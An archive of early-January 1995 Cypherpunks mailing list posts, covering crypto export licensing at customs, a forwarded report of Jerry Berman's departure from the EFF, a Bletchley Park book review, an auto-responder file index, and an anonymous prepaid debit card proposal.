From rishab at dxm.ernet.in Sun Jan 1 04:00:48 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Sun, 1 Jan 95 04:00:48 PST
Subject: Exporting cryptographic materials, theory vs. practice
Message-ID:

Matt Blaze :
> So we chatted about computers and cryptography for a while. Finally,
> the two of them decided that it wouldn't really hurt for them to just
> sign the form as long as I promise to call my lawyer and get the SED

Just which form did they sign, exactly? These procedures remind me of Feynman's
refusal to sign more than 12 times during some government talk.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                     "In between the breaths is
rishab at dxm.ernet.in                  the space where we live"
rishab at arbornet.org                         - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335          H 34C Saket, New Delhi 110017, INDIA

From mab at research.att.com Sun Jan 1 09:21:32 1995
From: mab at research.att.com (Matt Blaze)
Date: Sun, 1 Jan 95 09:21:32 PST
Subject: Exporting cryptographic materials, theory vs. practice
In-Reply-To:
Message-ID: <9501011723.AA12712@merckx.info.att.com>

>Just which form did they sign, exactly? These procedures remind me of Feynman's
>refusal to sign more than 12 times during some government talk.

The license itself has a space for the customs people to "endorse" each
export/re-import. Interestingly, I can't figure out how to distinguish
between the signature I got when I left and the one I got when I came
back. There are just two signatures and stamps on the back of the license,
one dated when I left and one dated when I returned.

From pcw at access.digex.net Sun Jan 1 12:38:42 1995
From: pcw at access.digex.net (Peter Wayner)
Date: Sun, 1 Jan 95 12:38:42 PST
Subject: Stegno for Kids
Message-ID: <199501012039.AA14592@access2.digex.net>

I was at a birthday party for a nine-year old niece.
She got some dolls (ugh), a Sega Game Gear Game called "Out Run" (not bad)
and Crayola brand secret writing pens (WOW!!!!). There are about 8 pens in
the set. You write secretly with two of them and develop the image with the
other six. I believe the 6 developing pens create images in different
colors, but I'm not sure. It just wouldn't look cool for me to rip open the
package at SideShow Pizza and hog her gift. Then I had to go. Alas...

-Peter

From lile at art.net Sun Jan 1 13:21:15 1995
From: lile at art.net (Lile Elam)
Date: Sun, 1 Jan 95 13:21:15 PST
Subject: good news about the EFF...
Message-ID: <199501012115.NAA06292@art.net>

This might be of interest:

---------- Forwarded message ----------
Date: Tue, 20 Dec 1994 17:04:23 -0800
From: Brock N. Meeks
To: cwd-l at cyberwerks.com
Subject: CWD Changes in the Wind At EFF

CyberWire Dispatch // Copyright (c) 1994 //

Jacking in from the "Back to the Future" Port:

Washington, DC -- The Electronic Frontier Foundation has fired its Policy
Director Jerry Berman and will soon release a sweeping new agenda for 1995
that promises to return the organization to its original grassroots
beginning.

Asked to comment on his firing, Berman bristles and says: "I think that's
baloney." Then he quickly adds: "Did you ever think I might have wanted to
leave?"

Berman has, in fact, left EFF, to head a new, as yet unannounced, policy
group called the Center for Democracy and Technology. His departure from
EFF and the creation of CDT will be made public this week in a joint
announcement with EFF, sources said. The official line that will be spun
to the public is that the two came to a "mutual parting of the ways."

That benign statement, however, doesn't reflect the long hours of the
behind the scenes deliberations, in which the language of the press
releases will be as cautiously worded as an official State Department
briefing.

Heroes and pioneers always take the arrows; EFF lately has looked more
like a pin-cushion than its self-appointed role as protector of all things
Cyberspace. The beleaguered organization has over the course of the past
two years endured often withering criticism from the very frontier citizens
it was sworn to uphold and protect.

The reason: A perceived move away from its grassroots activism to the role
of a consummate Washington Insider deal maker.

Berman is the man largely responsible for cutting EFF's policy cloth. He
wears the suit well. Maybe too well. Although he has the political acumen
to arm-wrestle inside-the-beltway, it comes at the expense of his
management style, EFF insiders said.

Those shortcomings came at the expense of EFF's day-to-day operations and
didn't go unnoticed by its board of directors. The EFF board in October
fired Berman for mismanaging the group's organizational and fiscal
responsibilities. No impropriety or malfeasance was alleged, the board was
simply dissatisfied with Berman's day-to-day managing of the shop.

In a precursor to the board's October decision, it split Berman's job,
giving him charge of just the policy arm, which board members said played
to his strength. They then hired Andrew Taubman as executive director to
oversee the day to day tasks.

Separate from the organizational and fiscal misgivings, the board also
couldn't brook with priority on policy affairs that Berman had engineered.
Although Berman expertly navigated EFF through the choppy political waters
of Washington, that course increasingly steered the organization away from
its original vision as a populist group.

Never was the hardcore policy-driven slant of EFF more apparent than during
the two-plus year political firestorm that surrounded the FBI's infamous
Digital Wiretap.
The political wrangling during that time, in which Berman brokered the
influence of EFF with the backing of the telephone, computer and software
industries, to reach a compromise with legislators and the FBI on the
bill's language, increasingly drove a wedge between the organization and
its grassroots membership.

Nobody within EFF interviewed for this article disagreed with how Berman
ran his policy tour de force. In fact, the board was generally in agreement
that Berman did an excellent job in helping to broker a less nefarious
version of the FBI's wiretap bill than would have otherwise passed without
his involvement on EFF's behalf.

As effective as Berman was in shuffling between the political and
ideological interests of EFF and its members, the "inside baseball"
political bullshit was largely lost on the community of the Net, who viewed
it as a kind of betrayal.

The fact that there would be a backlash from the Net came as no surprise to
Berman and EFF, who recognized the fine line they had to walk in dealing
with a politically charged issue rivaled only by the Administration's
insipid Clipper Chip encryption policy.

You see, the Net community is a binary braintrust, a world of ones and
zeros -- either on or off -- in which shades of grey are rarely an option.
Yet it is exactly these shades of grey in which Berman excels and thrives.
It is a skill -- and damn near an art form -- to be able to move among the
shadows and Washington's land of a thousand different agendas. And that's
right where Berman had steered EFF.

However, it's not where the EFF board thought the organization belonged.

And so, in a few days the Net community will read a grand announcement in
which EFF and Jerry Berman state they've had a "mutual parting of the
ways." The announcement will be several fold, including:

-- The formation of Berman's new Center for Democracy and Technology.

-- That EFF has hired current board member David Johnson, currently a
computer law attorney with the Washington law firm of Wilmer, Cutler and
Pickering, to be its new policy director, although that exact title has yet
to be finalized.

-- A new policy agenda for EFF that includes creation of an annual "State
of the Net" report.

EFF Executive Director Taubman declined to comment on Berman's firing,
saying only that the organization and its former director had, indeed,
agreed to a "mutual parting of the ways." He said EFF and Berman's new
group would continue to work closely with each other and that the efforts
of each would be mutually beneficial.

Johnson said he was excited about the new policy efforts he would be
heading up for EFF, which, in addition to the "State of the Net" report,
includes commissioning papers and studies to help build a more solid idea
of what exactly constitutes the Net "community" on a global basis and
helping to define the Net's community as a recognizable legal entity.

In addition to the new policy efforts, Johnson will have to restock EFF's
policy department: All the EFF policy wonks have jumped ship, resigning
their positions and joining with Berman's new venture.

The upheaval at EFF -- which included moving the entire operation here to
new digs in Washington -- apparently hasn't hurt morale which has "never
been higher," Taubman said. Underscoring Taubman's remarks is EFF's on-line
legal counsel Mike Godwin, who said the changes "create an opportunity for
us to return to our more populist mission and vision that we started with."

All Things Being Equal
=================

Adversity for a political junkie is the warp and woof of Washington
culture. Berman is no worse for the wear, having parachuted out of EFF and
into his new organization. He said CDT will differ from EFF "on what to
emphasize." That emphasis will be to focus on "on the ground public
policy," he said.
And it won't only be Berman's staff that sets the scene for familiarity as
he jump starts CDT. The former EFF policy staffers will supply him with
horsepower and his political currency will open doors. But he needs cold
hard cash to feed the troops and pay the rent. That means his new
organization must have financial backing and here, too, there are no
strangers. Berman's bringing along a fair chunk of EFF's corporate sponsors
to his new home.

Companies providing seed money to Berman's CDT include AT&T, Bell Atlantic,
Nynex, Apple Computer and Microsoft. These same companies provided a
combined $235,000 in donations to EFF in 1993, minus Nynex, which wasn't
listed as a major donor (over $5,000) on EFF's tax returns. It's not known
if these companies will continue to fund EFF in full or in part or what
amount they have pledged to Berman's group.

Just how well-heeled CDT is and exactly who makes up the full roster of its
sponsorship remains to be seen. We'll know that after the organization
files its first tax returns, which will be a matter of public record.

Meeks out...

From raph at netcom.com Sun Jan 1 13:45:35 1995
From: raph at netcom.com (Raph Levien)
Date: Sun, 1 Jan 95 13:45:35 PST
Subject: Berman resignation
In-Reply-To: <199501012115.NAA06292@art.net>
Message-ID: <199501012145.NAA10782@netcom20.netcom.com>

Brock's piece on Jerry Berman's resignation broke about a week after I
sent my EFF t-shirt back, attn Jerry Berman.

Never again believe that cypherpunk political action doesn't make a
difference.

Raph

(BTW, I got a nice apology from Peter Lewis about the NYT article.
Apparently, it got shredded in the editing process)

From werewolf at io.org Sun Jan 1 14:54:07 1995
From: werewolf at io.org (Mark Terka)
Date: Sun, 1 Jan 95 14:54:07 PST
Subject: The Code Breaker's Work Bench?
Message-ID:

I saw someone mention this program on sci.crypt once. It's supposed to be
an aid to those trying to break a cypher.

Does anybody know the ftp site it is located on?
unimi.it perhaps?

--------------------------------------------------------------------------
Mark Terka     | werewolf at io.org             | public key (werewolf) by
Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request
---------------------------------------------------------------------------

From adam at bwh.harvard.edu Sun Jan 1 17:49:30 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sun, 1 Jan 95 17:49:30 PST
Subject: The Code Breaker's Work Bench?
In-Reply-To:
Message-ID: <199501020148.UAA23008@bwh.harvard.edu>

| I saw someone mention this program on sci.crypt once. Its supposed to be
| an aid to those trying to break a cypher.

From cbw.doc:

Overview
	The Crypt Breakers' Workbench (CBW) is an interactive
multi-window system for mounting a cipher-text only attack on a file
encrypted by the Unix crypt command. CBW is a workbench in the sense
that it provides the user with an integrated set of tools that
simplify the initial, middle and final portions of the decryption
process. A user interacts with the workbench by choosing tools and
setting parameters. CBW carries out the work and displays the
results. A moderately experienced user of CBW can easily decrypt both
long and short messages when bigram statistics are known for the
message space. The basic cryptanalytic techniques used by CBW are
described in a paper by Reeds and Weinberger that appeared in the
October 1984 issue of the ATT Bell Laboratories Technical Journal.
This manual explains the capabilities and operating procedures of CBW

coast.cs.purdue.edu:/pub/tools/unix/cbw.tar.Z

From werewolf at io.org Sun Jan 1 18:55:05 1995
From: werewolf at io.org (Mark Terka)
Date: Sun, 1 Jan 95 18:55:05 PST
Subject: The Code Breaker's Work Bench?
In-Reply-To: <199501020148.UAA23008@bwh.harvard.edu>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199501020148.UAA23008 at bwh.harvard.edu>,
Adam Shostack wrote:
>
>| I saw someone mention this program on sci.crypt once.
It's supposed to be
>| an aid to those trying to break a cypher.
>
>From cbw.doc:
>
>Overview
>	The Crypt Breakers' Workbench (CBW) is an interactive
>multi-window system for mounting a cipher-text only attack on a file
>encrypted by the Unix crypt command. CBW is a workbench in the sense

Ok....I thought it was more generic than that. To mount an attack on an
opponent requires specific programs oriented toward the cypher in question.

Can anyone suggest what programs / tools may be out there for cypher
busting? I'm just curious....and no, I'm not planning on reading my
girlfriend's mail :>. I'm just interested in the methods that exist in the
real world.

Hell, I'd even be interested in a program to bust Enigma. That would give a
basic example or idea of how codebreakers operate on a day to day basis.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From gnu Sun Jan 1 18:55:23 1995
From: gnu (gnu)
Date: Sun, 1 Jan 95 18:55:23 PST
Subject: Book review: Codebreakers, the Inside Story of Bletchley Park
Message-ID: <9501020255.AA13843@toad.com>

This is NOT David Kahn's excellent book "The Codebreakers". This is a
British volume full of personal stories of thirty people who worked at
Bletchley Park or at British code-breaking in the field during WW2.

I found it a very touching and personal book. Each person tells their
own story in a five- or six-page essay, and the stories cover a whole
range of activities, from cryptanalytical work to typing-and-filing to
the people who constructed and maintained the physical buildings.
As the introduction says, "...few of the events described here were
chronicled at the time, and those who worked at Bletchley and its
outstations were forbidden to talk or write about it -- almost to
remember it. The compiling of this book has rested almost entirely on
personal memories; and that is unusual in an account which pretends to
any sort of accuracy. Moreover, nobody who worked at Bletchley can
now be under 65; several contributors are in their mid-80s. For all
of us clear and accurate recollection of highly specialized Top Secret
facts across fifty years has been a demanding task, requiring much
cross-checking."

There are lots of details about how real live wartime code-breaking
worked fifty years ago -- details I have seen nowhere else. I
recommend this book to any cypherpunk.

Codebreakers: the inside story of Bletchley Park.
ed. by Francis Harry Hinsley and Alan Stripp.
Oxford, England: Oxford University Press, 1994 (hardback issued in 1993).
ISBN 0-19-285304-X. US$13.95, at my local bookstore.

--
John Gilmore    gnu at toad.com -- gnu at cygnus.com -- gnu at eff.org
A well-regulated intelligentsia, being necessary to the security of a free
State, the right of the people to keep and bear books, shall not be infringed.

From hayden at krypton.mankato.msus.edu Sun Jan 1 18:59:46 1995
From: hayden at krypton.mankato.msus.edu (Robert A. Hayden)
Date: Sun, 1 Jan 95 18:59:46 PST
Subject: Ch-ch-ch-ch-changes...
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I read with interest about the (about time) reorganization of the EFF.
While it is certainly a little early to make any kind of final decisions
about the EFF, I do wonder a few things:

What will the EFF now be doing now that isn't already done by other
organizations?

It sure seems to me that this CDT is awfully similar to the CPSR, except
it's headed by former EFF people who have been puckering up to the
Washington politicos, the Telcos and other entities for the past few
years. Is there really a purpose?

Any thoughts on how the EFF will change its approach?

I'm due for renewal in March and I want to make sure I'm not flushing my
money away.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

____        Robert A. Hayden         <=> hayden at krypton.mankato.msus.edu
\  /__          -=-=-=-=-            <=>          -=-=-=-=-
 \/  /   Finger for Geek Code Info   <=> All I want is a cure...
   \/  Finger for PGP Public Key     <=> And all my friends back!

From an172607 at anon.penet.fi Sun Jan 1 19:48:12 1995
From: an172607 at anon.penet.fi (duquesne duke)
Date: Sun, 1 Jan 95 19:48:12 PST
Subject: cnonymity, law and order
Message-ID: <9501020251.AA27454@anon.penet.fi>

I want to publicly thank John Young for making articles available.
Most of those articles I would not otherwise have seen. I was
particularly interested in Peter Lewis's article from the New York
Times that John offered.

Was there anyone in the world, well, in the cyberworld, who was
fooled by the article on the Microsoft acquisition of the Catholic
church? Anyone, who after reading that piece, considered anything
other than the creativity of the author, should be committed to
St. John's Home for the Desperately Dumb.

However, there was something in that article that was of concern.
If the Massachusetts judge in the MIT student case actually said
that he couldn't act because Congress had not enacted any laws,
then it is for sure they will try to and they will try to act
hurriedly. Hurried actions by congress are even worse than their
considered actions.

I think we need to keep in touch with our representatives and
senators to make sure that all of the ramifications of any law
are considered.
Sometimes laws passed by Congress are rather well intentioned, but
the bureaucrats who write the policies and procedures by which the
laws will be implemented can make them an albatross around our
necks. These policy and procedure writers are dreadfully
misinformed and are too enamored with their power and position to
inform themselves.

Admittedly, anonymity and law and order are not easy bed fellows,
but difficult issues are never solved by hurried, uninformed,
politically-motivated action. This puts some pressure on us
cypherpunks. We have to be ready to consider all aspects of the
argument so that our presentation in favor of anonymity will be
taken seriously.

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help at anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin at anon.penet.fi.

From mab at crypto.com Sun Jan 1 20:21:50 1995
From: mab at crypto.com (Matt Blaze)
Date: Sun, 1 Jan 95 20:21:50 PST
Subject: Book review: Codebreakers, the Inside Story of Bletchley Park
In-Reply-To: <9501020255.AA13843@toad.com>
Message-ID: <199501020423.XAA26847@crypto.com>

Let me wholeheartedly echo John's recommendation; this is a terrific
book, one from which I learned a great deal. You'll get more out of it,
however, the more you already know about the Bletchley Park efforts and
the principles on which the Enigma and Lorenz machines operated. In
particular, Welchman's "The Hut Six Story" (McGraw Hill, 1982) makes good
preparatory reading. Unfortunately, that book has been out of print for
some time, but is fairly widely available at used book shops.

I had the opportunity to visit Bletchley Park a couple of weeks ago.
Most of the original huts are still standing, albeit in various states of
disrepair.
Walking around the site, knowing something of what went on
there in complete secrecy 50 years ago, I could only imagine the sense of
urgency and bustle that must have been in the air with 12000 people
working (day and night, over three shifts) in a relatively small space.
The more I learn about the effort the more impressed I am with the
accomplishments that took place there. In particular, the path from
basic research to operational functionality was far shorter than one
would think possible.

After the war, the site was used by GCHQ and by British Telecom as a
training center. It was recently saved from redevelopment and is now
being converted into a museum. Among the projects taking place there is
a construction of a working model of the original "Colossus" machine,
arguably the first electronic computer ever built (it was used in
breaking the Lorenz teleprinter cipher). I believe the site is currently
open for visitors on alternate weekends.

-matt

From lile at art.net Sun Jan 1 22:49:38 1995
From: lile at art.net (Lile Elam)
Date: Sun, 1 Jan 95 22:49:38 PST
Subject: I'm back. :)
Message-ID: <199501020643.WAA08339@art.net>

Hi folks,

I finally got back on cypherpunks. Have been incredibly busy
but wanted to keep in touch as several artist friends of mine
want to start using art as an encryption vehicle...

Should be fun...

Happy New Years. Let's hope it's a good one for cryptography.

-lile

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lile Elam          | "a brush in hand, a wisp of wind, she sighs
lile at art.net    |  knowing that this will be the great one..."
http://www.art.net |                   -lile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From s009amf at discover.wright.edu Sun Jan 1 23:04:48 1995
From: s009amf at discover.wright.edu (Aron Freed)
Date: Sun, 1 Jan 95 23:04:48 PST
Subject: good news about the EFF...
In-Reply-To: <199501012115.NAA06292@art.net>
Message-ID:

On Sun, 1 Jan 1995, Lile Elam wrote:

> CyberWire Dispatch // Copyright (c) 1994 //
>
> Jacking in from the "Back to the Future" Port:
>
> Washington, DC -- The Electronic Frontier Foundation has fired its Policy
> Director Jerry Berman and will soon release a sweeping new agenda for 1995
> that promises to return the organization to its original grassroots
> beginning.
>
> Asked to comment on his firing, Berman bristles and says: "I think that's
> baloney." Then he quickly adds: "Did you ever think I might have wanted to
> leave?"
>
> Berman has, in fact, left EFF, to head a new, as yet unannounced, policy
> group called the Center for Democracy and Technology. His departure from
> EFF and the creation of CDT will be made public this week in a joint
> announcement with EFF, sources said. The official line that will be spun
> to the public is that the two came to a "mutual parting of the ways."
>
> That benign statement, however, doesn't reflect the long hours of the
> behind the scenes deliberations, in which the language of the press
> releases will be as cautiously worded as an official State Department
> briefing.
>
> Heroes and pioneers always take the arrows; EFF lately has looked more
> like a pin-cushion than its self-appointed role as protector of all things
> Cyberspace. The beleaguered organization has over the course of the past
> two years endured often withering criticism from the very frontier citizens
> it was sworn to uphold and protect.
>
> The reason: A perceived move away from its grassroots activism to the role
> of a consummate Washington Insider deal maker.

Has anyone seen Monty Python's Life of Brian..... Do I hear a
parallelism??? Something to the effect of "The People's Judean Front",
"The Popular People's Front", and it goes on and on....

How about for the modern approach.... CDT, EFF, CPSR, Cypherpunks... Do I
hear more..
Or are we so split up that we can't agree on our common goal....

Aaron

From marc at cam.ov.com Sun Jan 1 23:21:37 1995
From: marc at cam.ov.com (Marc Horowitz)
Date: Sun, 1 Jan 95 23:21:37 PST
Subject: Exporting cryptographic materials, theory vs. practice
Message-ID: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>

>> My conclusion from all this is that it just isn't possible for an
>> individual traveler to follow the rules.

I can think of at least half a dozen cypherpunks who will be going
to IETF in Stockholm in July. I suspect there are more. Perhaps we
should all arrange to take the same flight, while carrying some bit of
approved-for-export material. Should drive the Customs guys
completely nuts.

Marc

From skaplin at skypoint.com Sun Jan 1 23:25:31 1995
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Sun, 1 Jan 95 23:25:31 PST
Subject: Listing of Files on the Auto-Responder as of 01-01-95
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Last Modified: 01-01-95 20:30 (CST)

This is the index for Sam Kaplin's Auto-Responder.

To get a file: Send a message to: skaplin at c2.org
The subject of the message MUST BE: SEND FILE [file_name]

EXAMPLE: Subject: SEND FILE help <----Case Sensitive!!!

All binary files are UUENCODED with PGP signatures. Please address all
comments or problems to skaplin at skypoint.com. If you receive a blank
message back, then the file you requested does not exist. Should you have
a crypto related file that you would like added, contact me at:
skaplin at skypoint.com. Please note that I am subject to the petty whims
of the U.S. government, so I will not add any files which may be subject
to ITAR.

- --------------------------------------------------------------------------
File Name            Description
- --------------------------------------------------------------------------
apgp212_1.uue        Autopgp 2.12 offline mail packet processor.
                     Automates PGP functions. Part 1 of 4
apgp212_2.uue        Autopgp 2.12 offline mail packet processor.
                     Automates PGP functions. Part 2 of 4
apgp212_3.uue        Autopgp 2.12 offline mail packet processor.
                     Automates PGP functions. Part 3 of 4
apgp212_4.uue        Autopgp 2.12 offline mail packet processor.
                     Automates PGP functions. Part 4 of 4
apgp22b2_1.uue       Autopgp 2.2b2 offline mail packet processor.
                     Automates PGP functions. Part 1 of 4 BETA
apgp22b2_2.uue       Autopgp 2.2b2 offline mail packet processor.
                     Automates PGP functions. Part 2 of 4 BETA
apgp22b2_3.uue       Autopgp 2.2b2 offline mail packet processor.
                     Automates PGP functions. Part 3 of 4 BETA
apgp22b2_4.uue       Autopgp 2.2b2 offline mail packet processor.
                     Automates PGP functions. Part 4 of 4 BETA
cp-faq1.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 1 of 11
cp-faq2.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 2 of 11
cp-faq3.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 3 of 11
cp-faq4.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 4 of 11
cp-faq5.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 5 of 11
cp-faq6.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 6 of 11
cp-faq7.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 7 of 11
cp-faq8.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 8 of 11
cp-faq9.uue          Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 9 of 11
cp-faq10.uue         Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 10 of 11
cp-faq11.uue         Tim May's Cypherpunk Faq - Everything you wanted to know
                     about C'Punk issues, but were afraid to ask.
                     Part 11 of 11
crypto1.uue          The Faq from talk.politics.crypto. A general overview
                     of cryptography. Part 1 of 2
crypto2.uue          The Faq from talk.politics.crypto. A general overview
                     of cryptography. Part 2 of 2
help                 This file.
key                  Sam Kaplin's PGP Public keys.
news_gateways        A listing of Mail -News gateways
pgpfaq1.uue          Frequently asked questions about PGP. Part 1 of 2
pgpfaq2.uue          Frequently asked questions about PGP. Part 2 of 2
rsa1.uue             A Faq put out by RSA outlining cryptography as it
                     applies to RSA. Part 1 of 2
rsa2.uue             A Faq put out by RSA outlining cryptography as it
                     applies to RSA. Part 2 of 2
remailer_list        A current listing of remailer sites.
wherefaq.long        Where to obtain PGP. (Long Version)
wherefaq.short       Where to obtain PGP. (Short Version)
yn075_1.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 1 of 14
yn075_2.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 2 of 14
yn075_3.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 3 of 14
yn075_4.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 4 of 14
yn075_5.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 5 of 14
yn075_6.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 6 of 14
yn075_7.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 7 of 14
yn075_8.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 8 of 14
yn075_9.uue          YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 9 of 14
yn075_10.uue         YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 10 of 14
yn075_11.uue         YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 11 of 14
yn075_12.uue         YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 12 of 14
yn075_13.uue         YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 13 of 14
yn075_14.uue         YARN .075 offline mail reader. Minimally supports PGP internally.
                     Part 14 of 14

==============================================================================
Interpretation is the revenge of the intellect upon art.
                - Susan Sontag
==============================================================================
skaplin at skypoint.com                   | Finger skaplin at infinity.c2.org for
                                         | a listing of crypto related files
PGP encrypted mail is accepted and       | available on my auto-responder.
preferred.                               | (Yes...the faqs are there!)
                                         |
E-mail key at four11.com for PGP Key or  | "...vidi vici veni" - Overheard
Finger skaplin at mirage.skypoint.com    | outside a Roman brothel.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From carolann at icicle.winternet.com Sun Jan 1 23:44:20 1995
From: carolann at icicle.winternet.com (Carol Anne Braddock)
Date: Sun, 1 Jan 95 23:44:20 PST
Subject: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>
Message-ID:

I couldn't agree with the general drift much more.
The real objective is to get the customs officials
used to the procedure of dealing with the cryptographic materials.

Your best asset is a good feature reporter and a photographer.

Right now, I don't think U.S. Customs is going to ask you if you
have PGP in your PC if you leave the country, or return either.
They should, and I'd be proud to say yes.

Registered Bellcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..."
The TS NET REGISTERED PGP KEY NO.0C91594D
carolann at icicle.winternet.com finger carolann at winternet.com |more
***********************************************************************
My WWW Homepage Page is at: http://www.winternet.com/~carolann

On Mon, 2 Jan 1995, Marc Horowitz wrote:

> >> My conclusion from all this is that it just isn't possible for an
> >> individual traveler to follow the rules.
>
> I can think of a at least half a dozen cypherpunks who will be going
> to IETF in Stockholm in July. I suspect there are more. Perhaps we
> should all arrange to take the same flight, while carrying some bit of
> approved-for-export material. Should drive the Customs guys
> completely nuts.
>
> Marc
>

From lile at art.net Mon Jan 2 00:55:30 1995
From: lile at art.net (Lile Elam)
Date: Mon, 2 Jan 95 00:55:30 PST
Subject: Exporting cryptographic materials, theory vs. practice
Message-ID: <199501020848.AAA08819@art.net>

But what if that plane crashed...

It's better to spread people out over several flights...

-lile

From skaplin at skypoint.com Mon Jan 2 01:02:15 1995
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Mon, 2 Jan 95 01:02:15 PST
Subject: Anonymous payment scheme
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

This idea just popped into my head, just as I was about to fall asleep. Being the idiot that I am, I had to get up to write it down. This idea has probably been presented before...but I haven't seen it here yet.

Let's suppose myself and 10,000 of my closest friends form the First National Cypherpunk Bank and Trust. We go through all of the hassles in order to be the issuer of a Master Card or Visa. Now instead of having a credit line, it is set up as a debit card.
The card's limit is how ever much you have prepaid the bank in advance. Once you have hit your prepaid amount the card no longer gets approved. Now because everything is prepaid, there is no risk to me, so I'll put any name you want on the card. The questions I have are:

Is this legal in the U.S.?

If so, is anyone doing it?

If it's not legal in the U.S., is it legal anyplace else.

If this is a gray area, why wouldn't this scheme work?

If this scheme was set up, it appears to me that the infrastructure for anonymous payments/netcash is already in place. Of course the issuer would get a healthy fee for issuing the card...but then again, there truly is no such thing as a free lunch.

As my 10,000 friends and I have no plans to set this up, feel free to pick it apart at will. (which I'm sure it will be)

Sam

==============================================================================
There is an order of things in this universe.
        -- Apollo, "Who Mourns for Adonais?" stardate 3468.1
==============================================================================
skaplin at skypoint.com                  | Finger skaplin at infinity.c2.org for
                                        | a listing of crypto related files
PGP encrypted mail is accepted and      | available on my auto-responder.
preferred.                              | (Yes...the faqs are there!)
                                        |
E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard
Finger skaplin at mirage.skypoint.com   | outside a Roman brothel.
==============================================================================

From werewolf at io.org Mon Jan 2 01:46:07 1995
From: werewolf at io.org (Mark Terka)
Date: Mon, 2 Jan 95 01:46:07 PST
Subject: Anonymous payment scheme
In-Reply-To:
Message-ID:

On Mon, 2 Jan 1995, Samuel Kaplin wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> This idea just popped into my head, just as I was about to fall asleep.
> Being the idiot that I am, I had to get up to write it down. This idea has

....best time for ideas....between sleep and wakefulness.....:>

>
> Let's suppose myself and 10,000 of my closest friends form the First
> National Cypherpunk Bank and Trust. We go through all of the hassles in
> order to be the issuer of a Master Card or Visa. Now instead of having a
> credit line, it is set up as a debit card. The card's limit is how ever

Why jump through the hoops Visa or M/C would send you through if it's a DEBIT card??? You don't need them for something like that, simply the acceptance of the Internet community, that credits from another user drawn on the Cypherpunk Bank would be accepted.....which leads to your next paragraph...

> much you have prepaid the bank in advance. Once you have hit your prepaid
> amount the card no longer gets approved. Now because everything is prepaid,
> there is no risk to me, so I'll put any name you want on the card. The
> questions I have are:

Sounds good.....and practical. ANY citizen in the world deposits with your "Bank" legal tender in an account.
US dollars would likely fit the bill as they are pretty well accepted from North America to North Korea (black market maybe.....but still accepted :>).

Then, when someone presents to your Bank proof of purchase/transfer etc (a digitally signed message with your PGP Key perhaps?) then you transfer a dollar figure from one account to another ...... assuming both purchaser and seller have accounts at the Cypherpunk Bank.

If the purchaser does.....but the SELLER doesn't, then (if so desired by the seller) you have three choices:

1) open an account, f/o (favour of.....sorry....I'm a Banker so pardon my lapsing now and again into our jargon) of the seller, transferring in the requisite amount of US $ for the seller's later use (ie... then HE goes out and buys something over the 'Net).

2) wire to the seller's account (overseas?) through a correspondent bank to the seller's bank where he has an account the US $.

3) mail a draft in the appropriate US $ to the seller's designated address .....either snail mail or Fed Express, or whatever courier is selected.

> Is this legal in the U.S.?

Dunno....I'm in Canada. But I know that U.S. banking arrangements are medieval so I doubt it.

> If so, is anyone doing it?

See above :>

> If it's not legal in the U.S., is it legal anyplace else.

